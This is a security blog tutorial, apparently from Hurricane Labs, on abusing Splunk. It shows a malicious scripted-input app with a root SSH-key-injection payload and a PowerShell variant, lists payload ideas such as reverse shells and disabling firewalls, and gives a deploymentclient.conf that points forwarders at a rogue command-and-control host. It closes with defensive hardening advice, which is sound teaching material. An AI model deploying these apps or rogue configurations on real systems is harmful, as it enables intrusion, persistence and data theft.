How to Leverage Splunk as an Offensive Security Tool
Splunk is a ubiquitous and powerful log collection tool. On the surface, its functionality and features appear straightforward; however, it is designed to allow for much more. Through the use of apps and add-ons, significant functionality can be added.
Splunk apps range in complexity. They can be as simple as a single-line configuration file or as complex as tools containing saved searches, user interface elements, and executable components. From the perspective of an attacker, apps containing executable code are particularly interesting.
Understanding the inherent risks associated with Splunk's various tools is important for those in both offensive and defensive security positions. This tutorial will demonstrate some of the approaches for using Splunk as an offensive tool, allowing you to reduce the likelihood these features will be used as attack vectors.
Given access to a Splunk environment or the ability to manipulate Splunk configuration files, what types of attacks can be accomplished? Is it possible to leverage Splunk as a covert channel for remote command and control? If so, what degree of access can be gained, and how might an attacker leverage this tool?
Scenario #1: Gaining access to the Splunk host
Assuming access to the SplunkWeb interface, is it possible to gain access to the underlying Splunk host?
In this scenario, our goal will be to elevate a user with Splunk permissions to system-level access on the underlying OS, outside of the Splunk environment. To do this, we will use a specially crafted Splunk app that leverages the scripted input functionality provided within the software.
We’ll start by developing the app we need and testing it on our own development Splunk instance. Once we’re confident this app is working as expected, we can package it into something we can deploy on another Splunk instance.
This app will consist of two main components: a script and an inputs config to execute the script on a regular basis:
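The layout looks like this (the app name my_app is a placeholder; use whatever name you like):

```
my_app/
    bin/
        inputs.sh
    local/
        inputs.conf
```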
The bin directory contains the script that the app will execute. In this case, we will call this inputs.sh, but the name can be anything that you want–it will just need to match the name referenced in the inputs config.
Let’s start with a sample script that will let us know that the script is working properly:
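A minimal sketch of such a script (the `ip addr` fallback is an assumption for systems without ifconfig):

```shell
#!/bin/sh
# Sample scripted input: print the date and the network interface
# configuration. Splunk indexes whatever this script writes to stdout.
date
ifconfig 2>/dev/null || ip addr
```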
This script simply outputs the date it runs and the network interface config for the system. There's nothing malicious here yet, but it's a good way to confirm that everything is working correctly, as well as to identify which systems we control. This confirmation will be helpful in the next scenario.
NOTE: In order to be run by Splunk, this script will need to have the appropriate permissions (e.g., the execute bit must be set).
Now that we have a sample script, we will configure an inputs stanza to execute this script. This is done via inputs.conf in the local/ directory of the app.
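A minimal local/inputs.conf sketch, with the script path relative to the app directory:

```ini
[script://./bin/inputs.sh]
interval = 300
sourcetype = script
index = main
disabled = 0
```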
This configuration will run the inputs.sh script every 300 seconds, and log the output to the main index, using the script sourcetype. When testing this, you will be able to run a search for index=main sourcetype=script and see the output of the script (the date and interface config) logged into Splunk. If this output is present and looks correct, this means the configuration is working correctly.
At this point, the script can be repurposed to do something more interesting than simply logging the date it runs. Some ideas:
- Add an SSH key to the system for a known user or for the root user
- Add a new user
- Disable the host firewall, or add an exception to allow you to log in
- Connect to an external server and pull down another script or executable
- Reverse Shell
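As an illustration of the first idea, a hypothetical payload sketch (the key, the comment, and the target directory are placeholders, not taken from the original article):

```shell
#!/bin/sh
# Hypothetical payload: append an attacker-controlled public key so the
# attacker can SSH in. KEY_DIR defaults to root's .ssh directory.
KEY_DIR="${KEY_DIR:-/root/.ssh}"
mkdir -p "$KEY_DIR"
chmod 700 "$KEY_DIR"
echo "ssh-ed25519 AAAAC3...placeholder attacker@example" >> "$KEY_DIR/authorized_keys"
chmod 600 "$KEY_DIR/authorized_keys"
```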
The scripted input runs on a regular schedule. This acts as a built-in persistence mechanism, since Splunk will automatically re-run the script. There are also configuration options to have the script only execute a single time or at system startup.
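Per Splunk's inputs.conf documentation, a negative interval value accomplishes the run-once behavior:

```ini
[script://./bin/inputs.sh]
# An interval of -1 runs the script a single time, at splunkd startup
interval = -1
```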
To package the app for deployment, simply tar up the app as such:
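Assuming the app directory is named my_app (a placeholder), something like:

```shell
# Package the app directory into a gzipped tarball for upload
tar -czf my_app.tgz my_app/
```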
NOTE: This file may also be named .spl (as a Splunk app). There is no difference in the format between a .tgz and an .spl file.
On the target system, navigate to Apps -> Manage Apps -> Install app from file. Select the app tarball we just created and upload. Once this app is installed, the script will execute on the schedule configured in inputs.conf.
As an alternative, if you have filesystem access, you can accomplish the same thing by extracting the tarball to $SPLUNK_HOME/etc/apps.
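A sketch of the filesystem approach (the tarball name is the placeholder from above; splunkd must be restarted, or its configuration reloaded, to pick up the new app):

```shell
# Extract the app directly into the Splunk apps directory
tar -xzf my_app.tgz -C "$SPLUNK_HOME/etc/apps/"
# Restart so splunkd loads the new app and its inputs
"$SPLUNK_HOME/bin/splunk" restart
```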
Depending on the payload of the script in this app, it is possible to use this approach to gain partial or complete control of the underlying host running Splunk. This is especially the case where Splunk is running as root instead of as a user with limited permissions. However, even if Splunk is not running as root, there is a wealth of information that can be obtained from Splunk itself that might be useful for gaining access to other systems within an enterprise network. These include accounts for authenticating to directory services, APIs, and SQL databases, to name a few. While Splunk stores passwords in config files in an encrypted way, it is relatively trivial to obtain the plaintext password if the encrypted form is available.
A similar app can be deployed for Windows systems running a PowerShell script. A sample Splunk app would consist of three files: an inputs.conf, a .path file, and a .ps1 script.
The inputs.conf configuration for a Windows script is very similar:
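A sketch of the Windows stanza (the interval shown is an assumption; the rest matches the behavior described in this article):

```ini
[script://.\bin\test_powershell.path]
interval = 300
sourcetype = powershell
index = main
disabled = 0
```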
This will execute the test_powershell.path script in the app's bin directory. Any output from the script will be stored in the main index with the sourcetype of powershell.
The .path script serves as the glue to run the actual PowerShell script. Using generic paths would be superior to the hardcoded paths in this example.
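A sketch of what the .path file might contain; both paths here are hypothetical hardcoded examples (the app name and install locations will vary):

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\SplunkUniversalForwarder\etc\apps\my_app\bin\test_powershell.ps1"
```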
The .ps1 script would contain the actual PowerShell payload.
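A benign test payload sketch, mirroring the Linux example (the cmdlets chosen here are assumptions):

```powershell
# test_powershell.ps1 -- benign test payload: print the date and
# interface configuration so we can confirm execution in Splunk
Get-Date
Get-NetIPAddress | Select-Object InterfaceAlias, IPAddress
```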
Now that we’ve explored how to leverage a Splunk app for executing commands on a system, let’s expand the scope of our control beyond that of a single system.
Scenario #2: Using Splunk as a Command and Control Framework
Splunk has a built-in mechanism for managing the configuration of other Splunk systems throughout the environment. How can we exploit this functionality to do more than just manage Splunk?
A Splunk deployment often consists of two major components: the Splunk infrastructure itself (indexers, search heads, heavy/intermediate forwarders, etc.) and the Splunk Universal Forwarders (running on endpoints and servers).
The Splunk Universal Forwarder is the recommended method for collecting logs from a supported machine–it allows for monitoring files and events from a system and forwarding those logs into the Splunk environment. However, the Universal Forwarder provides significantly more functionality than simply monitoring and reading log files. It also has the ability to run scripted inputs, which can be used on both Linux–as in the previous example–and Windows (PowerShell) machines.
A typical environment will have several core Splunk infrastructure systems as well as many Universal Forwarders. In a large deployment, this can mean hundreds or thousands of systems running Splunk that need to have their configurations managed.
To accomplish this, Splunk provides a feature called deployment server. When you configure deployment server:
- A central Splunk instance serves as a configuration store and contains all of the Splunk apps (in this case, primarily sets of configurations) that are needed within the environment.
- Splunk instances to be managed by the deployment server are configured as deployment clients through the deploymentclient.conf configuration file.
- A server class, which is a group of clients and associated apps, defines what apps are installed on which clients.
- The Deployment Server can provide configuration and install apps to both full Splunk Enterprise installations as well as Universal Forwarders.
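On the deployment server itself, these server class mappings are defined in serverclass.conf. A minimal sketch, with hypothetical class and app names:

```ini
# serverclass.conf on the deployment server
[serverClass:all_linux_hosts]
whitelist.0 = *

[serverClass:all_linux_hosts:app:my_scripted_app]
stateOnClient = enabled
restartSplunkd = true
```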
A deployment client will regularly connect to the configured deployment server to check for new configurations. By default, this happens every minute (phoneHomeIntervalInSecs = 60). When checking in, the deployment client will check for any changes in the apps that it should have installed. If a change is detected, the new apps will be downloaded and installed.
Fundamentally, this deployment client function already contains the basic features needed for a command and control system: clients will regularly check in to a system and pull down updated configuration. Since the apps distributed from the deployment server may contain executable scripts–and Universal Forwarders are often installed as root or are otherwise running with system level permissions–we can use this functionality to run arbitrary code on a large number of systems.
While it’s possible to use the deployment server functionality to hijack existing Splunk systems, there is also an additional use case here–configuring a rogue Splunk deployment to serve as a command and control as well as a data exfiltration platform.
Essentially, we have two approaches available, both using Splunk. If an environment is using Splunk already, hijack it. If there isn’t any Splunk yet, install it and use it as an attack platform.
Using Splunk in this way has a few advantages over (or at least offers functionality comparable to) a purpose-built tool based on existing malware:
- The Splunk Universal Forwarder is a trusted application produced by a legitimate publisher. This software is unlikely to be flagged as suspect by antivirus or anti-malware software.
- While Splunk communication typically happens over TCP/8089, this can be modified to run on any TCP port. I have run this on TCP/443 without any problem. From the perspective of a web filter or firewall, Splunk Deployment Server communication would look like normal web traffic.
- The check-in interval for deployment clients is easily configured and can be adjusted remotely.
- The Splunk Universal Forwarder is designed for reading files and forwarding data. This is perfect for exfiltrating data from an environment where outbound communication is allowed. Thresholds can be set to limit the bandwidth used to reduce the likelihood of detection.
- The Universal Forwarder natively supports most Windows, Linux, and macOS versions.
- There is native support for running scripted inputs, such as bash and PowerShell scripts.
There are a few disadvantages as well:
- The Universal Forwarder installer is a significantly larger download than purpose-built malware.
- Connection to a central instance is required to make this practical (but that’s the whole point of command and control, right?)
The command and control functionality can be configured in the Splunk Universal Forwarder by using the deploymentclient.conf file. A basic example would look like this:
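A sketch of deploymentclient.conf, using the hostname and check-in interval referenced in this article:

```ini
[deployment-client]
phoneHomeIntervalInSecs = 60

[target-broker:deploymentServer]
targetUri = rogue.splunkinstance.com:8089
```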
The port number may be updated if a different one is desired. Note that this will require that splunkd on the central instance be configured to listen on this port.
A system running Splunk with this configuration will check into rogue.splunkinstance.com every 60 seconds. From this deployment server it will be possible to install any Splunk app (including the scripted input example in Scenario 1).
Now that we’ve seen what can be done to attack Splunk systems and leverage Splunk as an attack framework, what can we do to identify and potentially prevent these attacks from being successful?
Do not run Splunk as root.
The Splunk Enterprise documentation considers this to be a best practice (http://docs.splunk.com/Documentation/Splunk/7.0.3/Installation/RunSplunkasadifferentornon-rootuser), but it is commonplace to see Splunk running as root to simplify administration. When Splunk runs as root, an attacker with Splunk administrator access can trivially gain complete access to the underlying host.
Do not run Splunk Universal Forwarders as root or as an administrator.
Running Splunk Universal Forwarders with limited permissions is more complicated and can make reading the data you need more difficult, but it enhances system security. It significantly reduces the ability of an attacker to leverage the Universal Forwarder as an attack vector.
Be aware of rogue Splunk instances.
All legitimate Splunk forwarders should be controlled by an authorized Splunk deployment server and be configured to forward data to legitimate Splunk indexers.
Use Splunk to monitor for environment changes.
Events such as forwarders restarting and no longer connecting to the official Splunk instance warrant investigation. If a deployment server is not used, the appearance of a deploymentclient.conf file on any forwarder should immediately be investigated. If a deployment server is in use, that file should also be monitored for any changes.
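As a hedged sketch, a scheduled search along these lines could surface forwarders that have stopped reporting (the one-hour threshold is an assumption; tune it to your check-in intervals):

```
| metadata type=hosts index=_internal
| where lastTime < relative_time(now(), "-1h")
| convert ctime(lastTime)
| table host lastTime
```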
Ensure that internal logs of all Splunk systems and Splunk Universal Forwarders are sent to your central Splunk instance.
These configuration changes will often be picked up in the internal logs prior to a system disappearing from your environment.
Change the default admin password.
By default, the Splunk admin account is set to admin/changeme. This is no longer the case for Splunk 7.1 and later, which require setting an admin password at installation.
Principle of least access.
Limit the number of users with Splunk administrator permissions. Limit access to the deployment server to the smallest scope practical.
Limit outbound access.
With the exception of app updates from splunkbase.splunk.com (and some other types of updates, such as automatic threatlist updates), most Splunk systems do not need to have outbound access to the Internet. Limiting the scope of this access or forcing systems to use a proxy can make remote CNC and data exfiltration much more difficult to accomplish successfully.
Expand your thoughts around SIEM strategy.
Consider your SIEM as a critical part of your IR monitoring and response strategy–not just as a monitoring tool itself, but as a potential target as well.
Hopefully this article was helpful in understanding the attack vectors facing a Splunk deployment and the steps to reduce the associated risks. If you have any questions about these exploits and mitigation strategies, please reach out to me at @tomkopchak on Twitter. Thanks for reading.
About Hurricane Labs
Hurricane Labs is a dynamic Managed Services Provider that unlocks the potential of Splunk and security for diverse enterprises across the United States. With a dedicated, Splunk-focused team and an emphasis on humanity and collaboration, we provide the skills, resources, and results to help make our customers’ lives easier.
For more information, visit www.hurricanelabs.com and follow us on Twitter @hurricanelabs.